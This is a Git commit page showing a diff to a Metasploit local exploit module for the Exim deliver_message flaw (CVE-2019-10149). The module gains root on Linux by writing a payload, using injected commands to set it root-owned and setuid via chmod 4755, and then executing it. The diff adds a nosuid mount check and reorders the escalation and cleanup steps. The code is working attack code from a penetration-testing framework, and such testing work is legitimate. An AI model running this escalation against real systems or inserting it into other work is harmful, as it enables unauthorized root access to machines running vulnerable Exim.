adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add a few checks

Browse Source 
Change-Id: Ieca129a54d2105bf646e6f848cb5ecec804c372f
This commit is contained in:
Guillaume Andre
2019-07-11 14:20:21 +01:00
parent 6b8ee4e4f9
commit 565e18cbe8
1 changed files with 10 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
+10 -10
View File
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
def initialize(info = {})
super(update_info(info,
@@ -16,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
'Description' => %q{
This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
Improper validation of recipient address in deliver_message()
function in /src/deliver.c may lead to remote command execution
function in /src/deliver.c may lead to command execution with root privileges
(CVE-2019-10149).
},
'License' => MSF_LICENSE,
@@ -133,8 +134,6 @@ class MetasploitModule < Msf::Exploit::Local
else
session.shell_command_token("rm -f #{@payload_path}")
end
print_good("Check session #{session.name}, you should have a root shell!")
end
def check
@@ -166,6 +165,10 @@ class MetasploitModule < Msf::Exploit::Local
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
end
if nosuid?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
end
unless datastore['PrependSetuid'] && datastore['PrependSetgid']
fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
'to get root privileges.')
@@ -175,15 +178,12 @@ class MetasploitModule < Msf::Exploit::Local
write_file(@payload_path, payload.encoded_exe)
inject_payload(encode_command("/bin/bash -c \"chown root #{@payload_path};"\
"chmod 4755 #{@payload_path}\""))
if setuid?(@payload_path)
cmd_exec("#{@payload_path & echo ")
if session_created?
return
end
unless setuid?(@payload_path)
rm_f(@payload_path)
fail_with(Failure::Unknown, "Couldn't escalate privileges")
end
rm_f(@payload_path)
print_error("Couldn't escalate privileges")
cmd_exec("#{@payload_path} & echo ")
end
end